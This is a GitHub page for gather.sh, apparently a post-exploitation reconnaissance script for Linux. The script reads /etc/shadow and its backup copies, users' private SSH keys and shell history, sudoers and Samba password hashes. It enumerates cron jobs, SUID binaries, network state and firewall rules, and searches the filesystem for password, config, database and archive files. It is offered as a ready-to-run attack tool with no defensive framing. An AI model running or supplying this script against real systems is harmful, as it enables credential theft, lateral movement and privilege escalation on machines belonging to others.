-
Notifications
You must be signed in to change notification settings - Fork 5
/
gather.sh
executable file
·152 lines (140 loc) · 3.65 KB
/
gather.sh
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
#!/bin/bash -v
HOME_DIR=`pwd`
echo '******* SYSTEM INFORMATION *******'
uname -a
lsb_release -a
arch
ps aux
cat /etc/issue
ls /home
cat /etc/passwd
cat /etc/shadow
cat /etc/hosts
cat /etc/resolv.conf
cat /etc/motd
cat /etc/crontab
mount
df -ah
cat /proc/cpuinfo
cat /proc/meminfo
w
who -a
id
free -m
ls /etc/init.d/
gcc -v
mysql --version
python --version
#perl --version
#ruby -v
last -a
dmesg
which nmap
which nc
echo '******* USER INFORMATION *******'
#ls -d *
#ls -d .*/
ls $HOME_DIR/.ssh
cat $HOME_DIR/.ssh/id_rsa
cat $HOME_DIR/.ssh/id_rsa.pub
cat $HOME_DIR/.ssh/known_hosts
cat $HOME_DIR/.ssh/authorized_keys
echo '>>>HISTORY FILE'
cat $HOME_DIR/.bash_history
echo '<<< HISTORY FILE'
## find . -type f -print -name 'id_rsa' -o -name 'id_rsa.pub' -o -iname '*password*' -exec cat {} \;
set
env
echo '******* NETWORK INFORMATION *******'
/sbin/ifconfig -a
netstat -nr
netstat -natup
arp -a
/sbin/iptables-save
/sbin/iptables -L
hostname
hostname -f
curl --connect-timeout 5 ifconfig.me
lsof -nPi
cat /etc/network/interfaces
echo '******* CONFIGURATION *******'
ls -aRl /etc/ | awk '$1 ~ /w.$/' | grep -v lrwx 2>/dev/null
cat /etc/issue{,.net}
cat /etc/passwd
cat /etc/shadow # (gotta try..)
cat /etc/shadow~ # (sometimes there when edited with gedit)
cat /etc/master.passwd
cat /etc/group
cat /etc/hosts
cat /etc/crontab
cat /etc/sysctl.conf
for user in $(cut -f1 -d: /etc/passwd); do echo $user; crontab -u $user -l; done
cat /etc/resolv.conf
cat /etc/syslog.conf
cat /etc/chttp.conf
cat /etc/lighttpd.conf
cat /etc/cups/cupsd.conf
cat /etc/inetd.conf
cat /opt/lampp/etc/httpd.conf
cat /etc/samba/smb.conf
cat /etc/openldap/ldap.conf
cat /etc/ldap/ldap.conf
pdbedit -L -w
pdbedit -L -v
cat /etc/exports
cat /etc/auto.master
cat /etc/auto_master
cat /etc/fstab
find /etc/sysconfig/ -type f -exec cat {} \;
cat /etc/sudoers
echo '******* DISTRO *******'
lsb_release -d # Generic for all LSB distros
cat /etc/*release
#/etc/SUSE-release # Novell SUSE
#/etc/redhat-release, /etc/redhat_version # Red Hat
#/etc/fedora-release # Fedora
#/etc/slackware-release, /etc/slackware-version # Slackware
#/etc/debian_release, /etc/debian_version, # Debian
#/etc/mandrake-release # Mandrake
#/etc/sun-release # Sun JDS
#/etc/release # Solaris/Sparc
#/etc/gentoo-release # Gentoo
#/etc/lsb-release # ubuntu
#/etc/rc.conf # arch linux
arch # on OpenBSD sample: OpenBSD.amd64
uname -a # (often hints at it pretty well)
#echo '******* Packages ******'
#rpm -qa --last | head
#yum list | grep installed
#dpkg -l
#dpkg -l |grep -i “linux-image”
#pkg_info # FreeBSD
#
echo '******* IMPORTANT FILES ******'
find /var/log -type f -exec ls -la {} \;
ls -alhtr /mnt
ls -alhtr /media
ls -alhtr /tmp
#ls -alhtr /home
#cd /home/; tree
ls /home/*/.ssh/*
echo '>>>Home's scripts'
cat /home/*/*.sh
echo '<<<Home's scripts'
#find /home -type f -iname '*.sh' -print -exec cat {} \;
find /home -type f -name 'id_rsa' -o -name 'id_rsa.pub' -o -iname '*.sh' -o -iname '*password*' -print;
find /home -type f -iname '.*history'
ls -lart /etc/rc.d/
#locate tar | grep [.]tar$
#locate tgz | grep [.]tgz$
#locate sql | grep [.]sql$
locate settings | grep [.]php$
locate config.inc | grep [.]php$
ls /home/*/id*
locate .properties | grep [.]properties # java config files
locate .xml | grep [.]xml # java/.net config files
find /sbin /usr/sbin /opt /lib `echo $PATH | 'sed s/:/ /g'` -perm -4000 # find suids
locate rhosts
# find / -type f -print -name 'id_rsa' -o -iname '*password*' -o -iname '*.sh' -exec cat {} \;
find / -nowarn -ignore_readdir_race -iname '*.sql' -o -iname '*.conf' -o -iname '*config*' -o -name '.git' -o -name '.svn' \
-o -name '*.tar' -o -name '*.gz' -o -name '*.bz2' -o -name '*.zip' -o -name '*.7z' -o -name '*.rar' 2>/dev/null